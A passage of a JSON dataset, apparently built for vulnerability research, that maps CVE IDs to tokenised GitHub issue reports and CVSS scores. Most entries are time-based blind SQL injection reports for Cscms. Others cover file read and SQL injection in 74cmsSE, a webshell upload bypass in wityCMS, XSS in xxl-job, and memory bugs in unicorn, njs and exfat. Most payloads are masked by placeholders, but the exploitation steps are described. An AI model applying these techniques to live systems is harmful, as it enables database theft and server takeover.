  82988. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  82989. "severity": "HIGH",
  82990. "baseScore": 7.2,
  82991. "impactScore": 5.9,
  82992. "exploitabilityScore": 1.2
  82993. },
  82994. {
  82995. "CVE_ID": "CVE-2022-29662",
  82996. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/17",
  82997. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/17",
  82998. "Repo_new": "chshcms/cscms",
  82999. "Issue_Created_At": "2022-04-19T01:59:58Z",
  83000. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG Administrators need to add another news after logging in.the following data package is constructed FILETAG CODETAG FILETAG Constructing malicious packets to implement SQL injection CODETAG FILETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload FILETAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code News::del FILETAG",
  83001. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83002. "severity": "HIGH",
  83003. "baseScore": 7.2,
  83004. "impactScore": 5.9,
  83005. "exploitabilityScore": 1.2
  83006. },
  83007. {
  83008. "CVE_ID": "CVE-2022-29663",
  83009. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/22",
  83010. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/22",
  83011. "Repo_new": "chshcms/cscms",
  83012. "Issue_Created_At": "2022-04-19T02:34:04Z",
  83013. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a SQL blind injection vulnerability in APITAG Add an album after the administrator logs in FILETAG Then delete the APITAG restoring the album in the recycle bin, construct malicious statements to realize SQL injection FILETAG CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload to blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerability exist",
  83014. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83015. "severity": "HIGH",
  83016. "baseScore": 7.2,
  83017. "impactScore": 5.9,
  83018. "exploitabilityScore": 1.2
  83019. },
  83020. {
  83021. "CVE_ID": "CVE-2022-29664",
  83022. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/23",
  83023. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/23",
  83024. "Repo_new": "chshcms/cscms",
  83025. "Issue_Created_At": "2022-04-19T02:39:42Z",
  83026. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a SQL blind injection vulnerability in APITAG There is an injection when adding an album to save, and the injection point is ID CODETAG FILETAG construct payload to blast database APITAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit FILETAG",
  83027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83028. "severity": "HIGH",
  83029. "baseScore": 8.8,
  83030. "impactScore": 5.9,
  83031. "exploitabilityScore": 2.8
  83032. },
  83033. {
  83034. "CVE_ID": "CVE-2022-29665",
  83035. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/19",
  83036. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/19",
  83037. "Repo_new": "chshcms/cscms",
  83038. "Issue_Created_At": "2022-04-19T02:15:35Z",
  83039. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG Details Add a news topic after the administrator logs in FILETAG CODETAG FILETAG When deleting news topics, malicious statements can be constructed to realize SQL injection FILETAG CODETAG FILETAG The payload executes and sleeps for NUMBERTAG seconds,so construct payload to Blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the Injection vulnerability exists",
  83040. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83041. "severity": "HIGH",
  83042. "baseScore": 7.2,
  83043. "impactScore": 5.9,
  83044. "exploitabilityScore": 1.2
  83045. },
  83046. {
  83047. "CVE_ID": "CVE-2022-29666",
  83048. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/24",
  83049. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/24",
  83050. "Repo_new": "chshcms/cscms",
  83051. "Issue_Created_At": "2022-04-19T02:43:26Z",
  83052. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a Injection vulnerability exists in APITAG The administrator needs to add a picture after logging in FILETAG construct payload CODETAG The injection point is ID and sleeps for NUMBERTAG seconds FILETAG construct payload APITAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
  83053. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83054. "severity": "HIGH",
  83055. "baseScore": 7.2,
  83056. "impactScore": 5.9,
  83057. "exploitabilityScore": 1.2
  83058. },
  83059. {
  83060. "CVE_ID": "CVE-2022-29667",
  83061. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/26",
  83062. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/26",
  83063. "Repo_new": "chshcms/cscms",
  83064. "Issue_Created_At": "2022-04-19T02:53:31Z",
  83065. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG Injection occurs when restoring deleted photos from the trash CODETAG FILETAG Discovery success makes the server APITAG APITAG construct payload to blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
  83066. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83067. "severity": "HIGH",
  83068. "baseScore": 8.8,
  83069. "impactScore": 5.9,
  83070. "exploitabilityScore": 2.8
  83071. },
  83072. {
  83073. "CVE_ID": "CVE-2022-29669",
  83074. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/20",
  83075. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/20",
  83076. "Repo_new": "chshcms/cscms",
  83077. "Issue_Created_At": "2022-04-19T02:21:42Z",
  83078. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details Injection vulnerability exists in APITAG construct payload CODETAG The injection point is ID and sleeps for NUMBERTAG seconds FILETAG construct payload APITAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
  83079. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83080. "severity": "HIGH",
  83081. "baseScore": 8.8,
  83082. "impactScore": 5.9,
  83083. "exploitabilityScore": 2.8
  83084. },
  83085. {
  83086. "CVE_ID": "CVE-2022-29680",
  83087. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/31",
  83088. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/31",
  83089. "Repo_new": "chshcms/cscms",
  83090. "Issue_Created_At": "2022-04-20T01:27:59Z",
  83091. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG The administrator needs to add a user to the member list after logging in. SQL injection vulnerability is generated when deleting the user. The constructed malicious payload is as follows FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83092. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83093. "severity": "HIGH",
  83094. "baseScore": 7.2,
  83095. "impactScore": 5.9,
  83096. "exploitabilityScore": 1.2
  83097. },
  83098. {
  83099. "CVE_ID": "CVE-2022-29681",
  83100. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/35",
  83101. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/35",
  83102. "Repo_new": "chshcms/cscms",
  83103. "Issue_Created_At": "2022-04-20T01:40:45Z",
  83104. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a friendship link first. SQL injection vulnerability occurs when deleting the friendship link. The constructed malicious payload is as follows FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83105. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83106. "severity": "HIGH",
  83107. "baseScore": 7.2,
  83108. "impactScore": 5.9,
  83109. "exploitabilityScore": 1.2
  83110. },
  83111. {
  83112. "CVE_ID": "CVE-2022-29682",
  83113. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/36",
  83114. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/36",
  83115. "Repo_new": "chshcms/cscms",
  83116. "Issue_Created_At": "2022-04-20T01:43:49Z",
  83117. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG The administrator needs to add a video theme after logging in. SQL injection vulnerability is generated when deleting the video theme. The constructed malicious payload is as follows FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83118. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83119. "severity": "HIGH",
  83120. "baseScore": 7.2,
  83121. "impactScore": 5.9,
  83122. "exploitabilityScore": 1.2
  83123. },
  83124. {
  83125. "CVE_ID": "CVE-2022-29683",
  83126. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/34",
  83127. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/34",
  83128. "Repo_new": "chshcms/cscms",
  83129. "Issue_Created_At": "2022-04-20T01:36:23Z",
  83130. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83131. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83132. "severity": "HIGH",
  83133. "baseScore": 7.2,
  83134. "impactScore": 5.9,
  83135. "exploitabilityScore": 1.2
  83136. },
  83137. {
  83138. "CVE_ID": "CVE-2022-29684",
  83139. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/33",
  83140. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/33",
  83141. "Repo_new": "chshcms/cscms",
  83142. "Issue_Created_At": "2022-04-20T01:33:15Z",
  83143. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83144. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83145. "severity": "HIGH",
  83146. "baseScore": 7.2,
  83147. "impactScore": 5.9,
  83148. "exploitabilityScore": 1.2
  83149. },
  83150. {
  83151. "CVE_ID": "CVE-2022-29686",
  83152. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/29",
  83153. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/29",
  83154. "Repo_new": "chshcms/cscms",
  83155. "Issue_Created_At": "2022-04-20T01:14:41Z",
  83156. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a singer first. SQL injection vulnerability is generated when adding singers. The constructed malicious payload is as follows",
  83157. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83158. "severity": "HIGH",
  83159. "baseScore": 7.2,
  83160. "impactScore": 5.9,
  83161. "exploitabilityScore": 1.2
  83162. },
  83163. {
  83164. "CVE_ID": "CVE-2022-29687",
  83165. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/30",
  83166. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/30",
  83167. "Repo_new": "chshcms/cscms",
  83168. "Issue_Created_At": "2022-04-20T01:21:31Z",
  83169. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG by APITAG Details there is a Injection vulnerability exists in APITAG The administrator needs to add a member after logging in. SQL injection vulnerability is generated when deleting the member. The constructed malicious payload is as follows CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83170. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83171. "severity": "HIGH",
  83172. "baseScore": 7.2,
  83173. "impactScore": 5.9,
  83174. "exploitabilityScore": 1.2
  83175. },
  83176. {
  83177. "CVE_ID": "CVE-2022-29688",
  83178. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/27",
  83179. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/27",
  83180. "Repo_new": "chshcms/cscms",
  83181. "Issue_Created_At": "2022-04-20T01:08:46Z",
  83182. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a song and then delete the song. When the song is recycled from the recycle bin, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows CODETAG FILETAG Discovery success makes the server sleep Construct payload database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
  83183. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83184. "severity": "HIGH",
  83185. "baseScore": 7.2,
  83186. "impactScore": 5.9,
  83187. "exploitabilityScore": 1.2
  83188. },
  83189. {
  83190. "CVE_ID": "CVE-2022-29689",
  83191. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/28",
  83192. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/28",
  83193. "Repo_new": "chshcms/cscms",
  83194. "Issue_Created_At": "2022-04-20T01:12:49Z",
  83195. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a singer first and then delete the singer. When deleting the singer, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows CODETAG FILETAG You can see that success makes the server sleep Construct payload database FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83196. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83197. "severity": "HIGH",
  83198. "baseScore": 7.2,
  83199. "impactScore": 5.9,
  83200. "exploitabilityScore": 1.2
  83201. },
  83202. {
  83203. "CVE_ID": "CVE-2022-29692",
  83204. "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1578",
  83205. "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1578",
  83206. "Repo_new": "unicorn-engine/unicorn",
  83207. "Issue_Created_At": "2022-04-01T09:53:58Z",
  83208. "description": "Null pointer caused by UAF in unicorn NUMBERTAG Hello, :) Unicorn NUMBERTAG Python API Add APITAG to the hook function (uc_hook_mem_read_unmapped) Releasing the hook function will cause the null pointer dereference. I'm not sure if it's a UAF. APITAG is as follows ERRORTAG gdb debug ERRORTAG",
  83209. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  83210. "severity": "HIGH",
  83211. "baseScore": 7.8,
  83212. "impactScore": 5.9,
  83213. "exploitabilityScore": 1.8
  83214. },
  83215. {
  83216. "CVE_ID": "CVE-2022-29693",
  83217. "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1586",
  83218. "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1586",
  83219. "Repo_new": "unicorn-engine/unicorn",
  83220. "Issue_Created_At": "2022-04-11T07:30:52Z",
  83221. "description": "Memory leaks caused by unexpected architecture in unicorn dev branch. Hi :) When we used unexpected architecture such as APITAG , there was a memory leak in unicorn2. APITAG ERRORTAG If we don't use APITAG , there will be a memory leak. ERRORTAG If we use APITAG , there will be a segmentation fault! ERRORTAG",
  83222. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83223. "severity": "HIGH",
  83224. "baseScore": 7.5,
  83225. "impactScore": 3.6,
  83226. "exploitabilityScore": 3.9
  83227. },
  83228. {
  83229. "CVE_ID": "CVE-2022-29694",
  83230. "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1588",
  83231. "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1588",
  83232. "Repo_new": "unicorn-engine/unicorn",
  83233. "Issue_Created_At": "2022-04-12T12:06:38Z",
  83234. "description": "Null pointer dereference in APITAG when HVA malloc failed. When we try to use APITAG to apply for super large memory, memory allocation in HAV fails, but succeeds in GVA. This inconsistency leads to null pointer dereference in APITAG releases the block requested by APITAG . APITAG ERRORTAG output ERRORTAG",
  83235. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83236. "severity": "HIGH",
  83237. "baseScore": 7.5,
  83238. "impactScore": 3.6,
  83239. "exploitabilityScore": 3.9
  83240. },
  83241. {
  83242. "CVE_ID": "CVE-2022-29695",
  83243. "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1595",
  83244. "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1595",
  83245. "Repo_new": "unicorn-engine/unicorn",
  83246. "Issue_Created_At": "2022-04-16T09:35:23Z",
  83247. "description": "Memory leaks caused by incomplete unicorn engine initialization.. Unicorn NUMBERTAG provide a new API ( APITAG ) that allows host to modify the architecture and mode of the CPU. However, this api doesn't determine whether the architecture and mode are supported by unicorn. Further more, Unicorn did not judge the result of engine initialization at the design stage. In other words, if we use unexpected architecture or mode to initialize unicorn engine, unicorn will alloc memory during initialization that will not be released. CODETAG Although APITAG is equal to zero, something is alloced in memory region such as APITAG . APITAG ERRORTAG Debug info ERRORTAG",
  83248. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83249. "severity": "HIGH",
  83250. "baseScore": 7.5,
  83251. "impactScore": 3.6,
  83252. "exploitabilityScore": 3.9
  83253. },
  83254. {
  83255. "CVE_ID": "CVE-2022-29720",
  83256. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/1",
  83257. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/1",
  83258. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  83259. "Issue_Created_At": "2022-04-21T12:06:00Z",
  83260. "description": "APITAG NUMBERTAG Arbitrary file read . Vulnerability Name: Arbitrary File Read Date of Discovery : PATHTAG Product version APITAG Download link\uff1a URLTAG Vulnerability Description: Arbitrary file reading is a kind of file operation vulnerability, generally arbitrary file reading vulnerability can read configuration information and even important files of the system. In severe cases, it may cause SSRF to roam to the intranet. Causes of vulnerabilities: Saves a function that reads a file The path to read the file is user controllable and is not checked or checked strictly The contents of the file were exported POC \uff1a GET PATHTAG HTTP NUMBERTAG Host: APITAG APITAG APITAG Sec Ch Ua: \" Not APITAG APITAG Sec Ch Ua Mobile NUMBERTAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG /\\ ; APITAG exchange;v=b3;q NUMBERTAG Sec Fetch Site: none Sec Fetch Mode: navigate Sec Fetch User NUMBERTAG Sec Fetch Dest: document Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Connection: close Code: PATHTAG FILETAG The \\$url is passed in the code, but there is no whitelist restriction on reading, so we can take advantage of: /.. / APITAG the parent directory) Reads the server file. PATHTAG FILETAG Prove: The following website uses APITAG FILETAG payload: APITAG Read the site database configuration file FILETAG And other file FILETAG Fix suggestion: Purify data: hard code or uniformly encode the file name parameters passed by the user, whitelist control of the file types, and reject parameters that contain malicious characters or null characters.",
  83261. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83262. "severity": "HIGH",
  83263. "baseScore": 7.5,
  83264. "impactScore": 3.6,
  83265. "exploitabilityScore": 3.9
  83266. },
  83267. {
  83268. "CVE_ID": "CVE-2022-29721",
  83269. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/2",
  83270. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/2",
  83271. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  83272. "Issue_Created_At": "2022-04-23T02:09:56Z",
  83273. "description": "SQL Injection vulnerability on NUMBERTAG cmsse. Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a URLTAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. FILETAG In the path PATHTAG is not strictly filtered for \\$keyword, resulting in SQL injection POC: URL1: FILETAG Payload\uff1a URLTAG As you can see from the figure below, the APITAG function is executed, and there is a time blind SQL FILETAG FILETAG When sleep NUMBERTAG FILETAG With the payload test above it is possible to delay the function being executed twice out of NUMBERTAG Time blinds are possible to guess the length of the database: Payload\uff1a URLTAG URLTAG FILETAG The database name of the website is NUMBERTAG cmsse, and the delay is exactly half the length of APITAG and the injection is successful FILETAG The same goes for the following test case URL2: APITAG payload: URLTAG URLTAG APITAG FILETAG FILETAG sleep NUMBERTAG FILETAG Guess the length of the database: The injection was successful FILETAG FILETAG URL3\uff1a APITAG Payload\uff1a URLTAG URLTAG FILETAG FILETAG sleep NUMBERTAG FILETAG Guess the length of the database: The injection was successful as seen from the graph FILETAG The following are other test cases that testers can test on their own URL4: APITAG URL5: FILETAG URL6: FILETAG URL7: FILETAG URL8: FILETAG URL9: FILETAG URL NUMBERTAG APITAG URL NUMBERTAG FILETAG URL NUMBERTAG APITAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
  83274. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83275. "severity": "HIGH",
  83276. "baseScore": 7.5,
  83277. "impactScore": 3.6,
  83278. "exploitabilityScore": 3.9
  83279. },
  83280. {
  83281. "CVE_ID": "CVE-2022-29725",
  83282. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/161",
  83283. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/161",
  83284. "Repo_new": "creatiwity/witycms",
  83285. "Issue_Created_At": "2022-04-22T05:27:54Z",
  83286. "description": "There is a file upload vulnerability in the background settings page. The server build environment is windows After logging in to the background, click Settings, there is a file upload vulnerability in an ico image upload point, you can bypass the upload, upload the webshell through this point, and you can take down the server. Vulnerability location\uff1a URLTAG FILETAG APITAG the shell file and capture the APITAG Content Type to image/ico, filename to .php and php followed by spaces to bypass FILETAG APITAG the response packet is NUMBERTAG the file itself has been uploaded APITAG uploaded file is located in the \\upload\\settings directory, named FILETAG FILETAG APITAG connection is successful through the ice scorpion, and the server shell is obtained. FILETAG FILETAG topsec deepzz",
  83287. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83288. "severity": "HIGH",
  83289. "baseScore": 8.8,
  83290. "impactScore": 5.9,
  83291. "exploitabilityScore": 2.8
  83292. },
  83293. {
  83294. "CVE_ID": "CVE-2022-29767",
  83295. "Issue_Url_old": "https://github.com/adbyby/Files/issues/2",
  83296. "Issue_Url_new": "https://github.com/adbyby/files/issues/2",
  83297. "Repo_new": "adbyby/files",
  83298. "Issue_Created_At": "2022-04-23T10:04:40Z",
  83299. "description": "APITAG NUMBERTAG IPQ NUMBERTAG AP CP NUMBERTAG C1 APITAG APITAG / APITAG Master (git NUMBERTAG APITAG NUMBERTAG c NUMBERTAG f) FILETAG APITAG FILETAG \u6f0f\u6d1e\u89e6\u53d1\u65b9\u5f0f\uff1a \u901a\u8fc7\u8bbf\u95eehttp://\u3010\u8def\u7531ip NUMBERTAG FILETAG FILETAG FILETAG \u539f\uff1a FILETAG \u539f\u56e0\uff1a APITAG FILETAG FILETAG FILETAG \u4e34\u65f6\u4fee\u590d\u5efa\u8bae\uff1a \u4e00\uff1a\u4f7f\u7528iptables NUMBERTAG iptables A INPUT p tcp \u2013dport NUMBERTAG i <eth0 \u4f60\u7684\u516c\u7f51\u51fa\u53e3> j reject \u4e8c\uff1a\u5173\u95edadbyby FILETAG",
  83300. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  83301. "severity": "MEDIUM",
  83302. "baseScore": 6.5,
  83303. "impactScore": 3.6,
  83304. "exploitabilityScore": 2.8
  83305. },
  83306. {
  83307. "CVE_ID": "CVE-2022-29770",
  83308. "Issue_Url_old": "https://github.com/xuxueli/xxl-job/issues/2836",
  83309. "Issue_Url_new": "https://github.com/xuxueli/xxl-job/issues/2836",
  83310. "Repo_new": "xuxueli/xxl-job",
  83311. "Issue_Created_At": "2022-04-23T15:02:41Z",
  83312. "description": "There is a stored XSS vulnerability in the task management of xxl job. Which version of XXL JOB do you using NUMBERTAG Expected behavior stroed XSS APITAG poc APITAG APITAG FILETAG NUMBERTAG press submit FILETAG NUMBERTAG SS attack occurs FILETAG",
  83313. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  83314. "severity": "MEDIUM",
  83315. "baseScore": 5.4,
  83316. "impactScore": 2.7,
  83317. "exploitabilityScore": 2.3
  83318. },
  83319. {
  83320. "CVE_ID": "CVE-2022-29779",
  83321. "Issue_Url_old": "https://github.com/nginx/njs/issues/485",
  83322. "Issue_Url_new": "https://github.com/nginx/njs/issues/485",
  83323. "Repo_new": "nginx/njs",
  83324. "Issue_Created_At": "2022-03-16T09:40:33Z",
  83325. "description": "SEGV APITAG in njs_value_own_enumerate. Environment OS : Linux leanderwang LC NUMBERTAG generic URLTAG SMP Mon Feb NUMBERTAG UTC NUMBERTAG APITAG Commit : URLTAG Version NUMBERTAG Build : NJS_CFLAGS=\"$NJS_CFLAGS fsanitize=address\" NJS_CFLAGS=\"$NJS_CFLAGS fno omit frame pointer\" APITAG ERRORTAG Stack dump ERRORTAG Credit xmzyshypnc( APITAG and P1umer( APITAG",
  83326. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  83327. "severity": "MEDIUM",
  83328. "baseScore": 5.5,
  83329. "impactScore": 3.6,
  83330. "exploitabilityScore": 1.8
  83331. },
  83332. {
  83333. "CVE_ID": "CVE-2022-29780",
  83334. "Issue_Url_old": "https://github.com/nginx/njs/issues/486",
  83335. "Issue_Url_new": "https://github.com/nginx/njs/issues/486",
  83336. "Repo_new": "nginx/njs",
  83337. "Issue_Created_At": "2022-03-21T02:29:41Z",
  83338. "description": "SEGV in njs_array_prototype_sort . Environment OS : Linux leanderwang LC NUMBERTAG generic URLTAG SMP Mon Feb NUMBERTAG UTC NUMBERTAG APITAG Commit : URLTAG Version NUMBERTAG Build : NJS_CFLAGS=\"$NJS_CFLAGS fsanitize=address\" NJS_CFLAGS=\"$NJS_CFLAGS fno omit frame pointer\" APITAG ERRORTAG Stack dump ERRORTAG Credit xmzyshypnc( APITAG and P1umer( APITAG",
  83339. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  83340. "severity": "MEDIUM",
  83341. "baseScore": 5.5,
  83342. "impactScore": 3.6,
  83343. "exploitabilityScore": 1.8
  83344. },
  83345. {
  83346. "CVE_ID": "CVE-2022-29973",
  83347. "Issue_Url_old": "https://github.com/relan/exfat/issues/185",
  83348. "Issue_Url_new": "https://github.com/relan/exfat/issues/185",
  83349. "Repo_new": "relan/exfat",
  83350. "Issue_Created_At": "2022-05-01T23:02:44Z",
  83351. "description": "Information disclosure in fuse exfat. Affected versions NUMBERTAG and latest code NUMBERTAG e4f NUMBERTAG Details: In the APITAG file system, each file has a stream extension with the following fields defined (among others): APITAG and APITAG ( URLTAG The former refers to the file size, the latter refers to the highest file offset written. According to the official APITAG specification, bytes after APITAG are undefined and \" FILETAG FILETAG FILETAG",
  83352. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  83353. "severity": "MEDIUM",
  83354. "baseScore": 4.7,
  83355. "impactScore": 3.6,
  83356. "exploitabilityScore": 1.0
  83357. },
  83358. {
  83359. "CVE_ID": "CVE-2022-29977",
